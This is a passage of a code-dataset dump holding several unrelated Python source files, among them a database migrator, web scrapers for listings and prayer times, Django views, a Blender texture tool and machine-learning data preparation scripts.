os.path.dirname(os.path.abspath(__file__))\n migrations_path = os.path.join(migrations_path, \"migrations\")\n migrations = set()\n for migration in os.listdir(migrations_path):\n # Migration folder must be in format x.x.x\n if not re.match(r\"^\\d.\\d.\\d$\", migration):\n LOGGER.error(\"Invalid migration %s\", migration)\n continue\n migration = [int(x) for x in migration.split(\".\")]\n migrations.add(tuple(migration))\n\n # Discard previous migrations and do a sort\n migrations = sorted([x for x in migrations if x > db_version])\n\n # Executes the required migrations\n migrator = self.migrator_class(self.database)\n for migration in migrations:\n migration_str = \".\".join([str(x) for x in migration])\n migration_file = os.path.join(migrations_path, migration_str,\n \"migrate.py\")\n spec = importlib.util.spec_from_file_location(migration_str,\n migration_file)\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n LOGGER.info(\"Upgrading database to version %s\", migration_str)\n with self.database.atomic():\n module.migrate(migrator)\n self.update_version(migration)\n LOGGER.info(\"Database migrated to version %s\", migration_str)\n\n @staticmethod\n def update_version(version=False):\n \"\"\"\n Update database migration\n\n :param tuple version: New version. If false uses release.version_db\n \"\"\"\n version = release.version_db if not version else version\n DatabaseVariable.set_variable(\"version\", version)\n","sub_path":"sysmonitor/orm/migrator.py","file_name":"migrator.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"94107641","text":"import logging\nimport time\nfrom datetime import datetime, timedelta\n\nimport Data_storage as ds\nimport Offer\nimport config as cfg\nimport request_composition\nfrom constants import HOUSES_CATEGORY_ID\n\nlogging.basicConfig(level=logging.INFO)\n\n\n# TODO: implement changing user agent\n# TODO: compare prices of a same listing\n# TODO: add search parameters to look into smaller market\n# TODO: get exact address from a map\n# TODO: gather list of districts, categories for search\n# TODO: save a phone number\n\n\ndef main():\n \"\"\"Parse offers according to limitations set in config file and in request\n composition.py and create a list with results\"\"\"\n for query in ds.get_parsing_queries():\n offers_added = 0\n\n query_name = query.get(\"Name\")\n category_id = query.get(\"category_id\")\n\n cfg.category_id = category_id\n\n logging.info(f\"Parsing offers for query: {query_name}. \\n\")\n\n list_of_offers = parse_search_results_pages(\n query.get(\"city_id\"),\n query.get(\"region_id\"),\n query.get(\"district_id\"),\n query.get(\"distance\"),\n query.get(\"query_term\"),\n query.get(\"category_id\"),\n )\n\n filtered_list_of_offers = filter_out_existing_offers(\n list_of_offers, category_id\n )\n\n for offer in filtered_list_of_offers:\n time.sleep(4) # sleep before getting next offer details\n try:\n offer_details = Offer.get_offer_details(offer)\n except (Offer.PageNotValid, AttributeError):\n continue\n update_offer_record(offer_details)\n offers_added += 1\n\n logging.info(f\"{query_name} added: {offers_added}.\")\n\n\ndef filter_out_existing_offers(list_of_offers, category_id):\n ids_in_db = ds.existing_offer_ids(category_id)\n\n filtered_list_of_offers = list()\n for offer in list_of_offers:\n try:\n olx_offer_id = int(offer.table[\"data-id\"]) # Get id of an offer\n except TypeError:\n continue\n if olx_offer_id not in ids_in_db:\n filtered_list_of_offers.append(offer)\n\n return filtered_list_of_offers\n\n\ndef parse_search_results_pages(\n city_id, region_id, district_id, distance, query_term, category_id\n):\n \"\"\"\n This function parses all offers from search pages within given limits\n and creates a list of offers with limited info\n available (price, olx_id, title).\n :param city_id:\n :param region_id:\n :param district_id:\n :param distance:\n :param query_term:\n :param category_id:\n :return:\n \"\"\"\n list_of_offers = []\n\n # Don't search for houses on pages above 10, they don't exist.\n if category_id == HOUSES_CATEGORY_ID & cfg.search_pages_lower_limit > 10:\n return list_of_offers\n\n search_url = request_composition.compose_request(\n city_id, region_id, district_id, category_id, distance, query_term\n )\n for current_page in range(\n cfg.search_pages_lower_limit, cfg.search_pages_upper_limit\n ):\n time.sleep(2) # to slow down process for anti-parsing algorithms\n search_url[1][\"page\"] = current_page\n try:\n offers_set = Offer.get_set_of_offers(\n search_url\n ) # Parses offers from a page\n except Offer.PageNotValid:\n continue\n for offer in offers_set:\n list_of_offers.append(\n offer\n ) # Parses offers from all pages in a range and creates list\n logging.info(f\"Number of offers parsed from search: {len(list_of_offers)} \\n\")\n return list_of_offers\n\n\ndef update_offer_record(list_of_offers):\n \"\"\"\n Adds offer record if it doesn't exist in data storage\n :param list_of_offers:\n :return:\n \"\"\"\n for offer in list_of_offers:\n ds.write_to_db(offer)\n\n\nstart_time = datetime.now()\nmain()\nlogging.info(\n f\"--- Process finished in {str(timedelta(seconds=(datetime.now() - start_time).seconds))} ---\"\n)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"329829794","text":"import pandas as pd\nimport Text_Proc_Utils as TPU\n\n# This function returns a dataframe with 2 columns. Category of expenses column as a categorical variable \n# and expense description as string. \ndef Get_Data(File_Path):\n expenses = pd.DataFrame.from_csv(File_Path,index_col= None)\n \n expenses.category = expenses.category.astype(\"category\")\n \n Sentences = expenses['expense description'].tolist()\n \n return Sentences, expenses.category\n\n# This function takes the expenses decription sentences and returns sentence vectors\ndef Get_Feature_Vectors(Sentences,model):\n V=[]\n for sentence in Sentences:\n V.append(TPU.sent_vectorizer(sentence, model))\n return V\n\n","sub_path":"Data_Prep_Utils.py","file_name":"Data_Prep_Utils.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233723264","text":"# _*_ coding:utf-8 _*_\nimport os,sys,json\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\nimport requests\nimport urllib3\nurllib3.disable_warnings()\n\nclass SendRequestsHeader():\n def sendRequestsheader(self,apiData):\n \"\"\"\n 发送接口请求\n :param apiData:接口请求数据\n :return: 返回接口响应信息,以json格式\n \"\"\"\n try:\n #发送请求数据\n method = apiData[\"method\"]\n # print(method)\n url = apiData[\"url\"]\n # print(url)\n if apiData[\"params\"] == \"\":\n par = None\n else:\n par = apiData[\"params\"]\n # print(par)\n if apiData[\"headers\"] == \"\":\n h = None\n else:\n h = apiData[\"headers\"]\n print(h)\n if apiData[\"body\"] == \"\":\n body_data = None\n else:\n body_data = apiData[\"body\"]\n\n type = apiData[\"type\"]\n #print(type)\n v = False\n if type == \"data\":\n body = body_data\n #print(body)\n elif type == \"json\":\n body =json.dumps(body_data)\n else:\n body = body_data\n #print(body)\n re =requests.request(method=method,url =url, headers =h,params = par,data=body,verify = v)\n print(re)\n msg = re.headers\n # print(msg)\n # msg['status_code']=re.status_code\n # header = re.headers\n # print(header)\n #print(msg)\n #print(re.status_code)\n return msg\n #print(re.text)\n # if method ==\"get\":\n # re = s.get(url =url, headers =h,params = par,data = body,verify = v)\n # print(re.text)\n # return re\n # elif method == \"post\":\n # re = s.post(url =url, headers =h,params = par,data = body,verify = v)\n # print(re.text)\n # return re\n except Exception as e:\n print(e)","sub_path":"lib/sendrequestheader.py","file_name":"sendrequestheader.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468742684","text":"from dataAcquisition import User\nfrom dataAcquisition import Wiki\n\nuserIDs = open('UserIDs.txt', 'r')\nfeatures = open('feature.txt', 'w')\n\n\n\ndef reputationFeature(user):\n if user.reputation > 1:\n features.write('0 ')\n else:\n features.write('1 ')\n\ndef badgeCount(user):\n if user.total_badges:\n features.write('0 ')\n else:\n features.write('1 ')\n\nfor userID in userIDs:\n user = User(userID)\n\n #import functions for gathering here\n reputationFeature(user)\n badgeCount(user)\n\n features.write('\\n')\n\nfeatures.close()\nuserIDs.close()\n","sub_path":"featureCollection.py","file_name":"featureCollection.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"225115724","text":"import json\nimport glob\nfrom tqdm import tqdm\nimport statistics\nimport os\nimport math\nfrom collections import defaultdict, Counter, OrderedDict\nimport pickle\nfrom copy import deepcopy\n\n\ndef get_repre(pair):\n h, tmp = pair\n t = list(tmp)\n new_t = ''\n if len(t) == 1:\n new_t = t[0]\n elif len(t) == 2:\n new_t = t[0] + ' and ' + t[1]\n else:\n new_t = ', '.join(t[:-1]) + ', and ' + t[-1]\n return h, new_t\n\ndef get_repre_r(pair):\n h, t = pair\n t = list(t)\n new_t = ''\n if len(t) == 1:\n new_t = t[0]\n elif len(t) == 2:\n new_t = t[0] + ' and ' + t[1]\n else:\n new_t = ', '.join(t[:-1]) + ', and ' + t[-1]\n # print(new_t, h)\n return new_t, h\ndef get_whole(t):\n new_t = ''\n if len(t) == 1:\n new_t = t[0]\n elif len(t) == 2:\n new_t = t[0] + ' and ' + t[1]\n else:\n new_t = ', '.join(t[:-1]) + ', and ' + t[-1]\n return new_t\n\n\npath = 'data/ORIGINALITY/test.json'\npath_f = 'Novelty.txt'\nwf = open(path_f, 'w')\ncount_ = 0\nidds = []\nwith open(path, 'r') as f:\n for line in tqdm(f):\n data = json.loads(line)\n diff_c, diff_rel, txts_list, c2t, c2num, r2num = data['src']\n score = data['score']\n if len(diff_c) == 0 and len(diff_rel) != 0:\n continue \n output = []\n pid = data['pid']\n output.append('id: ' + pid + ' '+ data['title'] + '\\n')\n output.append('score: ' + str(data['score']) + '\\n')\n real_name = {}\n pair_used_for = defaultdict(set)\n compare = defaultdict(set)\n features = defaultdict(set)\n pair_e = defaultdict(set)\n output.append('Strengths:\\n')\n flag = True\n for h, t, r in diff_rel:\n if r == \"USED-FOR\":\n try:\n if c2t[t] in [\"Method\", \"Material\", \"Metric\"] and c2t[h] == 'Task':\n pair_used_for[h].add(t)\n except:\n pair_used_for[h].add(t)\n\n elif r == 'COMPARE':\n if h != t:\n if h in compare:\n compare[h].add(t)\n else:\n compare[t].add(h)\n elif r == 'FEATURE-OF':\n if h != t:\n features[t].add(h)\n elif r == \"EVALUATE-FOR\":\n try:\n if c2t[t] == \"Method\" and c2t[h] in [\"Material\", \"Metric\"]:\n pair_e[t].add(h)\n except:\n pass\n sorted_relation = []\n r = \"USED-FOR\"\n for h, ts in pair_used_for.items():\n pair = (h, ts)\n score = 0\n for t in ts:\n rel = str((h, t, r))\n score += r2num[rel] \n sorted_relation.append((get_repre(pair), score))\n sorted_relation.sort(key=lambda x: x[1], reverse=True)\n for pair, count in sorted_relation:\n if score > 3:\n output.append('\\tThis paper uses novel %s for %s . \\n' % pair)\n else:\n output.append('\\tThis paper uses %s for %s . \\n' % pair)\n # output.append('\\tTerm Frequency:'+ str(count) + '\\n\\n')\n flag = False\n \n if flag:\n sorted_relation = []\n r = \"COMPARE\"\n for h, ts in compare.items():\n pair = (h, ts)\n score = 0\n for t in ts:\n rel = str((h, t, r))\n if rel not in r2num:\n rel = str((t, h, r))\n score += r2num[rel] \n sorted_relation.append((get_repre(pair), score))\n sorted_relation.sort(key=lambda x: x[1], reverse=True)\n for pair, count in sorted_relation:\n output.append('\\tThe paper compare %s with %s . \\n' % pair)\n # output.append('\\tTerm Frequency:'+ str(count) + '\\n\\n')\n flag = False\n\n if flag:\n sorted_relation = []\n r = 'FEATURE-OF'\n for h, ts in features.items():\n pair = (h, ts)\n score = 0\n for t in ts:\n rel = str((t, h, r))\n score += r2num[rel] \n sorted_relation.append((get_repre_r(pair), score))\n sorted_relation.sort(key=lambda x: x[1], reverse=True)\n for pair, count in sorted_relation:\n output.append('\\tThe paper uses %s for %s . \\n' % pair)\n # output.append('\\tTerm Frequency:'+ str(count) + '\\n\\n')\n flag = False\n\n if flag:\n sorted_relation = []\n r = \"EVALUATE-FOR\"\n new_entities = []\n for h, ts in pair_e.items():\n pair = (h, ts)\n score = 0\n new_entities.append(h)\n for t in ts:\n rel = str((t, h, r))\n score += r2num[rel] \n sorted_relation.append((pair, score))\n sorted_relation.sort(key=lambda x: x[1], reverse=True)\n if len(new_entities) > 0:\n output.append('\\tThis paper proposes a new %s. \\n' % get_whole(new_entities))\n\n for pair, count in sorted_relation:\n output.append('\\tThe authors then evaluate %s using %s. \\n' % get_repre(pair))\n # output.append('\\tTerm Frequency:'+ str(count) + '\\n\\n')\n flag = False\n if flag:\n metric = []\n method = []\n task = []\n material = []\n other = []\n for e in diff_c:\n if e not in c2t:\n other.append(e)\n elif c2t[e] == \"Method\":\n method.append(e)\n elif c2t[e] == \"Material\":\n material.append(e)\n elif c2t[e] == \"Metric\":\n metric.append(e)\n elif c2t[e] == 'Task':\n task.append(e)\n else:\n other.append(e)\n method = sorted(method, key=lambda i: c2num[i], reverse=True)\n task = sorted(task, key=lambda i: c2num[i], reverse=True)\n material = sorted(material, key=lambda i: c2num[i], reverse=True)\n o = sorted(other, key=lambda i: c2num[i], reverse=True)\n if score > 3:\n if len(method[:5]) > 0:\n output.append('\\tThe paper proposes novel %s' % get_whole(method[:2] ))\n\n if len(task) > 0:\n output.append(' for %s.\\n' % task[0])\n else:\n output.append('.\\n')\n # output.append('\\tTerm Frequency:')\n for m in method[:5]:\n output.append(str(c2num[m])+ ' ')\n for m in task[:5]:\n output.append(str(c2num[m])+ ' ')\n output.append('\\n\\n')\n flag = False\n elif len(other) > 0:\n output.append('\\tThe paper proposes novel%s' % get_whole(other[:2]))\n\n if len(task) > 0:\n output.append(' for %s.\\n' % task[0])\n else:\n output.append('.\\n')\n # output.append('\\tTerm Frequency:')\n # for m in other[:2]:\n # output.append(str(c2num[m])+ ' ')\n # for m in task[:1]:\n # output.append(str(c2num[m])+ ' ')\n # output.append('\\n\\n')\n flag = False\n else:\n flag = True\n else:\n if len(method[:5]) > 0:\n output.append('\\tThe paper uses %s' % get_whole(method[:5] ))\n\n if len(task) > 0:\n output.append(' for %s.\\n' % task[0])\n else:\n output.append('.\\n')\n # output.append('\\tTerm Frequency:')\n # for m in method[:2]:\n # output.append(str(c2num[m])+ ' ')\n # for m in task[:1]:\n # output.append(str(c2num[m])+ ' ')\n # output.append('\\n\\n')\n flag = False\n elif len(other) > 0:\n output.append('\\tThe paper proposes novel%s' % get_whole(other[:2]))\n\n if len(task) > 0:\n output.append(' for %s.\\n' % task[0])\n else:\n output.append('.\\n')\n # output.append('\\tTerm Frequency:')\n # for m in other[:2]:\n # output.append(str(c2num[m])+ ' ')\n # for m in task[:1]:\n # output.append(str(c2num[m])+ ' ')\n # output.append('\\n\\n')\n flag = False\n else:\n flag = True\n if flag:\n if len(task) > 0:\n output.append('\\tThe paper proposes novel %s .\\n' % get_whole(task[:2]))\n # output.append('\\tTerm Frequency:')\n # for m in task[:2]:\n # output.append(str(c2num[m])+ ' ')\n # output.append('\\n\\n')\n else:\n continue\n \n output.append('\\n')\n output.append('Reference:\\n')\n for txt in data['tgt']:\n output.append(txt + '\\n')\n output.append('\\n\\n\\n')\n idds.append(pid)\n wf.writelines(output)\n count_ += 1\n if count_ %5 == 0:\n wf.write('-'*100)\n wf.write('\\n\\n')\n print(idds)\n idds = [] \nwf.close()","sub_path":"Comment Generation/novelty.py","file_name":"novelty.py","file_ext":"py","file_size_in_byte":9878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"201547748","text":"import bs4\nimport requests\n\nurl = 'https://jadwalsholat.pkpu.or.id/?id=266' # url tempat melakukan scraping\ncontents = requests.get(url)\n# print(contents.text)\nresponse = bs4.BeautifulSoup(contents.text, \"html.parser\")\n# bs4 = package, beautifulsoup = class, contents.text = suply contenst yg berisi request yg mengambil url dari web\ndata = response.find_all('tr','table_highlight')\ndata = data[0] # untuk menghilangkan kurung kurawal, agar data di mulai dari data ke 0\n\nsholat = {} # inisialisasi bahwa sholat merupakan dictionary, yg memiliki nama variabel yang memiliki\n # attribute jam sholatnya\ni = 0\nfor d in data:\n if i == 1: # kenapa di deklarasikan data ke 1, karena data ke 0 = tanggalnya\n sholat['shubuh'] = d.get_text()\n elif i == 2:\n sholat['dhuhur'] = d.get_text()\n elif i == 3:\n sholat['ashar'] = d.get_text()\n elif i == 4:\n sholat['maghrib'] = d.get_text()\n elif i == 5:\n sholat['isya'] = d.get_text()\n i += 1\nprint(sholat)\nprint(sholat['ashar'])","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"537435134","text":"# coding=utf-8\n# Copyright 2020 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Lint as: python3\n\"\"\"Tests for flax modules.\"\"\"\n\nimport functools\nfrom absl.testing import parameterized\nimport tensorflow.compat.v1 as tf\nfrom protein_lm import domains\nfrom protein_lm import models\nfrom protein_lm import modules\n\nlm_cls = functools.partial(\n models.FlaxLM,\n num_layers=1,\n num_heads=1,\n emb_dim=64,\n mlp_dim=64,\n qkv_dim=64)\n\n\nclass ModulesTest(tf.test.TestCase, parameterized.TestCase):\n\n @parameterized.parameters(\n (modules.AddLearnedPositionalEncodings,),\n (modules.AddSinusoidalPositionalEncodings,))\n def test_positional_encodings(self, positional_encoding_module):\n \"\"\"Tests that the model runs with both types of positional encodings.\"\"\"\n domain = domains.FixedLengthDiscreteDomain(vocab_size=2, length=2)\n lm = lm_cls(domain=domain,\n positional_encoding_module=positional_encoding_module)\n lm.sample(1)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"protein_lm/modules_test.py","file_name":"modules_test.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313630562","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import Http404\nfrom django.shortcuts import render, redirect\nfrom django.template.defaultfilters import slugify\nfrom .forms import DashboardForm\nfrom .models import Dashboard\nfrom .forms import ContactForm\nfrom django.template.loader import get_template\nfrom django.core.mail import EmailMessage, send_mail\nfrom django.template import Context\n\n\n# Create your views here.\n\ndef index(request):\n\n\tdashboards = Dashboard.objects.all()\n\n\treturn render(request, 'collection/index.html', {\n\t\t'dashboards' : dashboards,\n\t\t })\n\ndef dashboard_detail(request, slug):\n\tdashboard = Dashboard.objects.get(slug=slug)\n\n\treturn render(request, 'collection/dashboard_detail.html', {\n\t\t'dashboard' : dashboard,\n\t\t})\n\n@login_required\ndef edit_dashboard(request, slug):\n\tdashboard = Dashboard.objects.get(slug=slug)\n\tif dashboard.user != request.user:\n\t\traise Http404\n\t\t\n\tform_class = DashboardForm\n\n\tif request.method == 'POST':\n\t\tform = form_class(data=request.POST, instance=dashboard)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('dashboard_detail', slug=dashboard.slug)\n\telse:\n\t\tform = form_class(instance=dashboard)\n\n\treturn render(request, 'collection/edit_dashboard.html', {\n\t\t'dashboard' : dashboard,\n\t\t'form' : form,\n\t\t})\n\n\ndef create_dashboard(request):\n\tform_class = DashboardForm\n\n\tif request.method == 'POST':\n\t\tform = form_class(request.POST)\n\t\tif form.is_valid():\n\t\t\tdashboard = form.save(commit=False)\n\t\t\tdashboard.user = request.user\n\t\t\tdashboard.slug = slugify(dashboard.name)\n\n\t\t\tdashboard.save()\n\n\t\t\treturn redirect('dashboard_detail', slug=dashboard.slug)\n\n\n\telse:\n\t\tform = form_class()\n\n\treturn render(request, 'collection/create_dashboard.html', {\n\t\t'form': form,\n\t\t})\n\ndef browse_by_name(request, initial=None):\n\tif initial:\n\t\tdashboards = Dashboard.objects.filter(name__istartswith=initial)\n\t\tdashboards = dashboards.order_by('name')\n\n\telse:\n\t\tdashboards = Dashboard.objects.all().order_by('name')\n\n\treturn render(request, 'collection/search.html', {\n\t\t'dashboards' : dashboards,\n\t\t'initial' : initial,\n\n\n\t\t})\n\n\n#Contact form:\n\ndef contact(request):\n\tform_class = ContactForm\n\n\tif request.method == 'POST':\n\t\tform = form_class(data=request.POST)\n\n\t\tif form.is_valid():\n\t\t\tcontact_name = form.cleaned_data['contact_name']\n\t\t\tcontact_email = form.cleaned_data['contact_email']\n\t\t\tform_content = form.cleaned_data['content']\n\n\t\t\ttemplate = get_template('contact_template.txt')\n\n\t\t\tcontext = Context({\n\t\t\t\t'contact_name' : contact_name,\n\t\t\t\t'contact_email' : contact_email,\n\t\t\t\t'form_content' : form_content,\n\t\t\t})\n\t\t\tcontent = template.render(context)\n\n\t\t\temail = EmailMessage(\n\t\t\t\t'New contact form submission', \n\t\t\t\tcontent, \n\t\t\t\t'Your website ',\n\t\t\t\t['danilopfe@gmail.com'],\n\t\t\t\theaders = {'Reply-To' : contact_email }\n\t\t\t)\n\t\t\temail.send()\n\t\t\treturn redirect('contact')\n\n\treturn render(request, 'collection/contact.html', {\n\t\t'form' : form_class,\n\n\t})\n\n\n","sub_path":"collection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"570933801","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef logistic_loss(x):\n\n return np.log(1 + np.exp(1 - x))\n\n\ndef hinge_loss(x):\n\n tmp = 1 - x\n\n tmp[np.where(tmp <= 0)] = 0\n\n return tmp\n\n\ndef squared_hinge_loss(x):\n\n tmp = 1 - x\n\n tmp[np.where(tmp <= 0)] = 0\n\n return np.square(tmp)\n\n\nx = np.arange(-4, 4, 0.001)\n\nplt.plot(x, logistic_loss(x), 'r')\nplt.plot(x, hinge_loss(x), 'g')\nplt.plot(x, squared_hinge_loss(x), 'b')\nplt.legend([\"logistic loss\", \"hinge loss\", \"squared hinge loss\"])\nplt.title(\"Loss function\")\nplt.show()\n","sub_path":"machine_learning/loss_function_plot.py","file_name":"loss_function_plot.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"108592616","text":"# MIT License\r\n\r\n# Copyright (c) 2018 shotariya\r\n\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n\r\n\r\nimport bpy\r\nimport time\r\nimport math\r\nimport os\r\nfrom PIL import Image\r\n\r\n\r\nclass GenTex(bpy.types.Operator):\r\n bl_idname = 'shotariya.gen_tex'\r\n bl_label = 'Save Textures by UVs'\r\n bl_description = ''\r\n bl_options = {'REGISTER', 'UNDO', 'INTERNAL'}\r\n\r\n def execute(self, context):\r\n start_time = time.time()\r\n scn = context.scene\r\n save_path = scn.tex_path\r\n if not save_path:\r\n self.report({'ERROR'}, 'Please select Folder for Combined Texture')\r\n return {'FINISHED'}\r\n bpy.ops.shotariya.uv_fixer()\r\n work = []\r\n for obj in context.scene.objects:\r\n if obj.type == 'MESH':\r\n if not obj.data.uv_layers.active:\r\n continue\r\n mat_len = len(obj.material_slots)\r\n mat_info = [[] for x in range(mat_len)]\r\n tex_info = [[] for x in range(mat_len)]\r\n for face in obj.data.polygons:\r\n face_coords = [obj.data.uv_layers.active.data[loop_idx].uv for loop_idx in face.loop_indices]\r\n mat_info[face.material_index].append(face_coords)\r\n for mat, faces in enumerate(mat_info):\r\n x_list = [math.ceil(poly.x) for face in faces for poly in face if not math.isnan(poly.x)]\r\n y_list = [math.ceil(poly.y) for face in faces for poly in face if not math.isnan(poly.y)]\r\n tex_info[mat] = [max(x_list), max(y_list)]\r\n for index in range(mat_len):\r\n mat = obj.material_slots[index].material\r\n tex_slot = mat.texture_slots[0]\r\n if tex_slot:\r\n if (tex_info[index][0] > 1) or (tex_info[index][1] > 1):\r\n tex = tex_slot.texture\r\n if tex:\r\n if tex.to_save:\r\n tex_info[index].append(bpy.path.abspath(tex.image.filepath))\r\n tex_info[index].append(mat)\r\n if len([True for info in tex_info if len(info) > 2]) != 0:\r\n work.append(True)\r\n for info in tex_info:\r\n if len(info) > 3:\r\n img_name = info[2].split(os.sep)[-1].split('.')[0]\r\n img = Image.open(info[2])\r\n w, h = img.size\r\n if info[0] == 0:\r\n info[0] = 1\r\n if info[1] == 0:\r\n info[1] = 1\r\n if info[0] > 64:\r\n info[0] = 1\r\n if info[1] > 64:\r\n info[1] = 1\r\n result = Image.new('RGBA', (w * info[0], h * info[1]))\r\n for i in range(info[0]):\r\n for j in range(info[1]):\r\n x = i * w\r\n y = j * h\r\n result.paste(img, (x, y, x + w, y + h))\r\n result.save('{}{}{}_uv.png'.format(save_path, os.sep, img_name), 'PNG')\r\n mat = info[3]\r\n mat_index = 0\r\n for index in range(mat_len):\r\n if obj.material_slots[index].material == mat:\r\n mat_index = index\r\n tex_slot = mat.texture_slots[0]\r\n tex = tex_slot.texture\r\n tex.image = bpy.data.images.load('{}{}{}_uv.png'.format(save_path, os.sep, img_name))\r\n for face in obj.data.polygons:\r\n if face.material_index == mat_index:\r\n face_coords = [obj.data.uv_layers.active.data[loop_idx].uv for loop_idx in\r\n face.loop_indices]\r\n for z in face_coords:\r\n z.x = z.x / info[0]\r\n z.y = z.y / info[1]\r\n if not work:\r\n self.report({'ERROR'}, 'All Selected texture UVs bounds are 0-1')\r\n return {'FINISHED'}\r\n bpy.ops.shotariya.list_actions(action='GENERATE_MAT')\r\n bpy.ops.shotariya.list_actions(action='GENERATE_TEX')\r\n print('{} seconds passed'.format(time.time() - start_time))\r\n self.report({'INFO'}, 'Textures were created.')\r\n return{'FINISHED'}\r\n","sub_path":"gen_tex.py","file_name":"gen_tex.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"300736311","text":"import numpy as np\n\nclass PrepareData:\n\n def __init__(self):\n pass\n\n def read_files(self, path, num_samples):\n input_texts = []\n target_texts = []\n input_words = set([])\n target_words = set([])\n\n with open(path, 'r', encoding='utf-8') as file:\n lines = file.readlines()\n for line in lines[: min(num_samples, len(lines) -1)]:\n input_text, target_text = line.split(\"\\t\")[:2]\n target_text = '\\t' + target_text + '\\n'\n input_texts.append(input_text)\n target_texts.append(target_text)\n\n for word in input_text.split(\" \"):\n if word not in input_words:\n input_words.add(word)\n for word in target_text.split(\" \"):\n if word not in target_words:\n target_words.add(word)\n\n return input_texts, target_texts, input_words, target_words\n\n def vocab_generation(self, path, num_samples):\n\n input_texts, target_texts, input_words, target_words = self.read_files(path, num_samples)\n input_words = sorted(list(input_words))\n target_words = sorted(list(target_words))\n self.num_encoder_words = len(input_words)\n self.num_decoder_words = len(target_words)\n self.max_encoder_seq_length = max([len(text.split(\" \")) for text in input_texts])\n self.max_decoder_seq_length = max([len(text.split(\" \")) for text in target_texts])\n\n self.input_word_index = dict([(word ,i) for i, word in enumerate(input_words)])\n self.target_word_index = dict([(word ,i) for i, word in enumerate(target_words)])\n self.reverse_input_word_dict = dict((i,word) for word, i in self.input_word_index.items())\n self.reverse_target_word_dict = dict((i,word) for word, i in self.target_word_index.items())\n\n def process_inputs(self, input_texts, target_texts=None):\n encoder_input_data = np.zeros((len(input_texts), self.max_encoder_seq_length, self.num_encoder_words), dtype='float32')\n decoder_input_data = np.zeros((len(input_texts), self.max_decoder_seq_length, self.num_decoder_words), dtype='float32')\n decoder_target_data = np.zeros((len(input_texts), self.max_decoder_seq_length, self.num_decoder_words), dtype='float32')\n\n if self.mode == 'train':\n for i,(input_text, target_text) in enumerate(zip(input_texts, target_texts)):\n for t, word in enumerate(input_text.split(\" \")):\n try:\n encoder_input_data[i, t, self.input_word_index[word]] = 1.\n except:\n print(f'word {word} encountered for the 1st time, skipped')\n for t, word in enumerate(target_text.split(\" \")):\n decoder_input_data[i, t, self.target_word_index[word]] = 1.\n if t > 0:\n try:\n decoder_target_data[i,t-1, self.target_word_index[word]] = 1.\n except:\n print(f'word {word} encountered for the 1st time, skipped')\n return encoder_input_data, decoder_input_data, decoder_target_data, np.array(input_texts), np.array(target_texts)\n else:\n for i, input_text in enumerate(input_texts):\n for t, word in enumerate(input_text.split(\" \")):\n try:\n encoder_input_data[i, t, self.input_word_index[word]] = 1.\n except:\n print(f'word {word} encountered for the 1st time, skipped')\n\n return encoder_input_data, None, None, np.array(input_texts), None\n\n\n\n\n\n\nif __name__ == \"__main__\":\n prepare_data = PrepareData()\n input_words, target_words = prepare_data.read_files('./fra.txt',10e13)\n print(input_words)\n 